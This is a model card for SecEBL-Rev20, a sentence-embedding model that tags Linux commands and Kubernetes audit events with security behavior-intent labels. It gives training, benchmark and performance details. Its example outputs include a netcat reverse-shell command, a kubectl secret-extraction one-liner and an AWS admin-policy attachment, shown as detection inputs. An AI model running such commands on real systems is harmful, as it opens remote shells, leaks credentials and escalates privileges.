Instructions to use willchen0011/SecEBL with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- sentence-transformers
How to use willchen0011/SecEBL with sentence-transformers:
from sentence_transformers import SentenceTransformer model = SentenceTransformer("willchen0011/SecEBL") sentences = [ "That is a happy person", "That is a happy dog", "That is a very happy person", "Today is a sunny day" ] embeddings = model.encode(sentences) similarities = model.similarity(embeddings, embeddings) print(similarities.shape) # [4, 4] - Notebooks
- Google Colab
- Kaggle
SecEBL-Rev20
SecEBL stands for Security Event Behavior Labeler.
SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a Linux command line or normalized Kubernetes AuditLog event into ranked behavior-intent labels, so downstream detection can reason about what an actor is trying to do instead of only matching fixed strings, allowlists, blacklists, or opaque risk scores.
Project repository: github.com/EBWi11/SecEBL
At A Glance
| Area | Current release summary |
|---|---|
| Stable public API | L1 behavior-intent labeling with ranked top_labels. |
| Behavior vocabulary | 361 Rev20 behavior-intent tags across 12 security behavior groups. |
| Training scale | 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. |
| Corpus breadth | Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. |
| Benchmark scale | 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. |
| L1 accuracy | 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. |
| Inference performance | RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. |
| Training setup | Alibaba-NLP/gte-modernbert-base, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. |
The public examples include a reviewed, publicly releasable subset of the internal Linux final benchmark plus normalized Kubernetes AuditLog examples: 10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They exist so users can run the model locally and inspect outputs without access to private telemetry. The full training corpora, full internal benchmarks, private pressure-stream rows, and private run logs are not redistributed because parts of them contain real telemetry or real operational context.
First-Time User Path
Use the companion GitHub repository for the runnable code and this Hugging Face repository for model artifacts:
git clone https://github.com/EBWi11/SecEBL.git
cd SecEBL
git lfs install
git clone https://huggingface.co/willchen0011/SecEBL model_artifacts
pip install -e .
scripts/run_examples.sh
After the script finishes, inspect:
runs/examples/linux_l1/predictions.jsonl
runs/examples/l2/example_linux_session_results.json
L1 is the stable behavior-labeling API. It outputs ranked behavior evidence,
not an intrusion verdict. L2 is optional and experimental; it runs only when an
L2 artifact such as model_artifacts/l2_artifacts/logreg.joblib is available.
What This Repository Contains
This Hugging Face repository is the model artifact bundle.
| Path | Purpose |
|---|---|
model.safetensors, tokenizer/config files |
SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
semantic_texts.jsonl |
Rev20 semantic label texts used by the L1 retrieval path. |
schema/tags_schema_rev20.json |
Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
examples/linux/ |
Public subset of the internal Linux final benchmark and matching Rev20 labels. |
examples/k8s/ |
Public normalized Kubernetes AuditLog examples and matching Rev20 labels. |
examples/manifest.json |
Public example subset counts and distribution. |
rev20_tag_rfc.md |
Rev20 behavior-tag labeling RFC and boundary examples. |
l2_artifacts/logreg.joblib |
Experimental L2 logistic-regression session scorer. |
l2_artifacts/tag_risk_policy.rev20.json |
Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
l2_artifacts/train_summary.json |
Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. |
LICENSE, NOTICE |
Model license and attribution notices. |
This repository does not include the runnable helper scripts. Use EBWi11/SecEBL for the Python package and one-command test script. The same public benchmark-subset examples are included here for convenience.
Output Shape
L1 predictions expose ranked top_labels:
{
"observation_id": "event:0",
"command": "nc -e /bin/sh 203.0.113.10 4444",
"top_labels": [
{
"label_id": "spawn_reverse_shell",
"score": 0.811,
"axis": "execution_and_process"
},
{
"label_id": "connect_external_service",
"score": 0.488,
"axis": "network"
}
]
}
L1 does not emit behavior_tags and does not apply a user-facing tag-selection
threshold. behavior_tags[] is the field used by training and evaluation label
files. Runtime prediction output is ranked top_labels.
Why Intent Labels Matter
Traditional IDS pipelines often depend on signatures, rules, allowlists, blacklists, and low-explainability tabular ML. Those tools still matter, but they can struggle when legitimate tools are used in suspicious ways, when tool syntax drifts quickly, or when the same behavior appears in different telemetry formats.
SecEBL adds an intermediate representation:
raw security event
-> L1 behavior-intent recognition
-> L2 session reasoning or another downstream detector
-> alert / review / policy
L1 intentionally does not decide that a single event is an intrusion. It
produces explainable behavior evidence such as read_credential_material,
execute_remote_command, create_scheduled_task, grant_cluster_privilege,
or query_service_health.
This is useful for:
- LOLT / living-off-the-land behavior where the tool is legitimate but the behavior may be suspicious in context.
- Rule-writing lag, where new tool syntax appears faster than signatures can be maintained.
- Multi-platform telemetry, where Linux commands, Kubernetes audit events, and future telemetry can share a behavior vocabulary.
- Explainable detection, where an alert should be tied to explicit behavior labels rather than only an opaque score.
Data And Vocabulary
Rev20 is a flat behavior-tag schema.
| Item | Count |
|---|---|
| Top-level behavior groups | 12 |
| Behavior tags | 361 |
Schema groups:
| Group | Tags |
|---|---|
observation_and_discovery |
51 |
configuration_and_log_modification |
12 |
filesystem_and_data |
33 |
execution_and_process |
28 |
network |
51 |
identity_auth_and_secrets |
31 |
persistence_services_and_storage |
27 |
kernel_memory_and_tracing |
14 |
package_build_and_source |
19 |
database_and_infrastructure_services |
33 |
containers_and_cloud_native |
34 |
cloud_control_plane |
28 |
The release baseline was trained from internal Rev20 corpora:
| Corpus | Rows | Unique behavior tags | Notes |
|---|---|---|---|
| Linux command corpus | 85,277 | 361 | Mixed generated, reviewed, and manually expanded command examples. |
| Kubernetes AuditLog corpus | 1,008 | 40 | Manually authored normalized K8s audit events. |
The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a conservative executable-name estimate. Common families include shell utilities, network tools, package/build tools, cloud CLIs, IaC tools, container tooling, databases, secret stores, and Kubernetes tooling.
Training Details
The raw training corpora are not redistributed, but the following details are documented so readers can understand the model scale and method.
| Item | Value |
|---|---|
| Base model | Alibaba-NLP/gte-modernbert-base |
| Training objective | MultipleNegativesRankingLoss with hard-negative-aware batches |
| Training hardware | NVIDIA GeForce RTX 5090, 32GB VRAM, cuda:0 |
| Epochs | 128 full-pass epochs |
| Batch size | 112 |
| Precision | fp32 |
| Steps | 1,062 steps per epoch; 135,936 total optimizer steps |
| Runtime | 58,291 seconds, about 16.2 hours |
| Sequence length | 160 tokens |
| Optimizer schedule | learning rate 2e-5, warmup ratio 0.06, 8,156 warmup steps, weight decay 0.01 |
Training data scale:
| Training artifact | Count | Notes |
|---|---|---|
| Combined corpus rows | 86,285 | 85,277 Linux command rows plus 1,008 K8s AuditLog rows. |
| Non-empty training observations | 82,895 | Rows with usable behavior labels after skipping 3,390 abstain rows. |
| Base command-tag pairs | 117,092 | Positive command/tag pairs before boundary upsampling. |
| Effective positive pairs | 118,858 | Final pair count after targeted boundary upsampling. |
| Behavior labels | 361 | Full Rev20 behavior vocabulary used on the label side. |
The Linux corpus is intentionally mixed rather than a single synthetic source. The largest source slices are roughly 36.9k generated rows, 28.5k manually reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack batch rows, plus smaller targeted boundary, miss-review, public-attack, and high-miss batches.
Token lengths are short enough for a compact encoder. Across the final pair set, command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than 0.3% of examples exceed the 160-token training limit. Label-side semantic texts are p50 40 tokens and p95 62.
Hard negatives were designed in two layers:
- Schema-level negatives: the dataset builder used
schema_hard, with a 16-item hard-negative pool and up to 8 negatives per positive before MNRL batching. These negatives come from semantically nearby Rev20 tags, so the model is forced to separate labels such as read-vs-search, inspect-vs-modify, local-vs-remote execution, and similar tool-boundary cases. - Batch-level negatives: the training loader used hard-negative-aware MNRL
batches. The final run used config
rev20_conservative_20260620_ep96_miss_v11, covering 74 difficult labels and placing 2 hard-negative labels near each anchor where possible. - Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once, producing 1,766 extra training exposures. These rows target recurring failure modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries, no-hit review cases, and post-evaluation miss-review batches.
Public Benchmark Subset
This Hugging Face repository includes the same public benchmark examples as the
companion GitHub repository: the Linux benchmark subset under examples/linux/
and normalized Kubernetes AuditLog examples under examples/k8s/.
| Public artifact | Rows | Sessions | Notes |
|---|---|---|---|
examples/linux/example_sessions.jsonl |
10,520 | 531 | Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows. |
examples/linux/example_gold.rev20.jsonl |
10,520 | 531 | Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags. |
examples/k8s/example_sessions.jsonl |
144 | 46 | Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows. |
examples/k8s/example_gold.rev20.jsonl |
144 | 46 | Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags. |
Session-level labels use English enums: normal_operation and intrusion.
The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions,
and complete 361-tag coverage.
Evaluation Snapshot
The full internal benchmark data is not public. The aggregate size, distribution, and metrics are public so users can understand what the headline numbers mean.
Evaluation scale:
| Dataset | Rows | Rows with labels | Behavior-tag instances | Unique behavior tags |
|---|---|---|---|---|
| Linux internal benchmark | 12,594 | 11,889 | 17,287 | 361 / 361 |
| K8s evaluation set | 144 | 144 | 163 | 27 / 361 |
| Combined | 12,738 | 12,033 | 17,450 | 361 / 361 |
Retrieval quality:
| Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
|---|---|---|---|---|
| Linux internal benchmark | 87.32% | 98.49% | 95.44% | 96.44% |
| K8s evaluation set | 99.31% | 100.00% | 100.00% | 100.00% |
| Combined | 87.47% | 98.50% | 95.50% | 96.47% |
The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes complex multi-tag command rows. The K8s result should be read as a small-domain sanity result rather than broad Kubernetes coverage because the current K8s corpus is much smaller than the Linux corpus.
Internal Linux benchmark tag cardinality:
| Tags per row | Rows |
|---|---|
| 0 | 705 |
| 1 | 8,829 |
| 2 | 1,567 |
| 3 | 901 |
| 4 | 402 |
| 5 | 139 |
| 6+ | 51 |
Top internal Linux benchmark tags:
| Tag | Count |
|---|---|
stage_temporary_path |
987 |
inspect_network_state |
801 |
stage_hidden_path |
655 |
inspect_current_identity |
578 |
read_credential_material |
551 |
inspect_system_state |
481 |
inspect_infrastructure_service |
390 |
query_dns_records |
372 |
enumerate_filesystem |
365 |
search_credentials |
315 |
Example Outputs
These examples show the user-facing L1 output style. Scores are cosine/retrieval
scores after the release prompt profile. The public helper scripts save top
labels in predictions.jsonl.
| Event | Top 3 L1 tags | Note |
|---|---|---|
nc -e /bin/sh 203.0.113.10 4444 |
spawn_reverse_shell 0.811connect_external_service 0.488spawn_bind_shell 0.451 |
-e is recognized as reverse-shell execution. |
nc -v 203.0.113.10 443 |
connect_external_service 0.732spawn_reverse_shell 0.503create_reverse_tunnel 0.412 |
Connection intent ranks above shell-spawn intent. |
cat /root/install.log |
read_business_log 0.641read_system_log 0.431read_workload_logs 0.385 |
Log-read semantics dominate. |
cat /root/install.conf |
read_infrastructure_config 0.620read_system_config 0.612read_kernel_parameter 0.336 |
Config-read semantics dominate. |
kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} | base64 -d |
read_cluster_secret 0.730decode_data 0.716read_credential_material 0.363 |
K8s secret extraction and decoding. |
aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess |
grant_cloud_privilege 0.838modify_cloud_identity_policy 0.535modify_cloud_identity 0.459 |
Cloud privilege escalation semantics. |
curl -fsS http://127.0.0.1:8080/healthz |
query_service_health 0.840inspect_local_kubernetes_cluster 0.459inspect_container_runtime 0.383 |
Local service health check. |
Runtime Performance
SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20 tag definitions. The serving path embeds the event, embeds or loads tag definition embeddings, then ranks tags by similarity.
Current single-card CUDA recommendation:
| Setting | Value |
|---|---|
| Precision | FP16 |
| Attention | SDPA |
max_seq_length |
160 |
| Batch size | 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default |
| Sorting | sort_by=char |
| Padding | dynamic, no forced pad alignment |
| Output path | GPU tensor output plus GPU top-k |
Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:
| Mode | Throughput |
|---|---|
Recommended no-cache unique inference, bs224 |
mean 5,308.72 unique cmdlines/s |
Recommended no-cache latency, bs224 |
about 0.1884 ms per unique cmdline |
bs224 repeat range |
5,025.47 - 5,433.78 unique cmdlines/s |
Best quick-sweep point, bs384 |
5,378.45 unique cmdlines/s |
Exact raw-event cache lookup was measured separately at mean 1,817,462.76 rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.
L2 Artifact
This repository includes an experimental fitted L2 session scorer so the
companion GitHub scripts/run_examples.sh can run the public Linux and K8s L1
examples, plus Linux example-session scoring, when this model directory is used
as MODEL_DIR.
In this release, a session is a sequence of events grouped by session_id.
L1 labels each event independently. L2 scores the whole session by aggregating
cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions,
and routine-operation context. The L2 output is a session-level verdict such as
intrusion or normal_operation, not a replacement for per-command behavior
tags.
For compatibility with the released L2 artifact, L2 derives its session
features from cached L1 top_labels using an internal selected-tag feature
path. In plain terms, L2 filters the cached ranked labels inside its own feature
builder before session scoring. This does not change L1 prediction output:
users still receive ranked top_labels, not a selected behavior_tags field.
Runtime L2 does not use raw command text, user names, host names, or session ids as scoring features. Session ids may appear in private data-prep workflows for label assignment, but they are not runtime allow/deny lists.
Internal L2 summary:
| Check | Result |
|---|---|
| Withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
| 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
| OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
The 7M pressure-stream result was measured on real background telemetry plus embedded synthetic attack sessions. The underlying rows and real session identifiers are not redistributed. The included L2 artifact is a research/reproducibility component, not a general production IDS claim.
Direct SentenceTransformers Loading
You can load the embedding model directly:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("willchen0011/SecEBL")
Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler:
encode the event, encode or load the Rev20 semantic label texts from
semantic_texts.jsonl, rank labels by cosine similarity, and save the top-k
labels. For normal use, prefer the companion GitHub helpers because they keep
the prompt profile, semantic text loading, top-k output format, and optional L2
feature path aligned with this release.
Intended Use
- Research and evaluation of security-event behavior labeling.
- Internal security detection, investigation, and triage for systems an organization owns, operates, administers, or is explicitly authorized to defend.
- Building session-level risk scoring over SecEBL behavior-label streams.
Out Of Scope
- Standalone verdicting on a single event.
- Authorization or policy-compliance decisions without human validation.
- Monitoring systems you are not authorized to defend.
- Commercial security products, SaaS/API offerings, MDR/MSSP services, or third-party managed detection without a separate written commercial license.
License
The model artifacts are released under SecEBL Model License 1.0. This is an open-weight restricted-use model license, not Apache-2.0 and not an OSI-approved open source license.
The base model is Alibaba-NLP/gte-modernbert-base, which is Apache-2.0.
Source code, schemas, public examples, public documentation, and helper scripts
in the companion GitHub repository
(EBWi11/SecEBL) are Apache-2.0 unless a
file explicitly states otherwise. Public examples and documentation included in
this Hugging Face repository follow that same companion-repository licensing
unless a file explicitly states otherwise.
Commercial security offerings require a separate written commercial license.
- Downloads last month
- -
Model tree for willchen0011/SecEBL
Base model
answerdotai/ModernBERT-base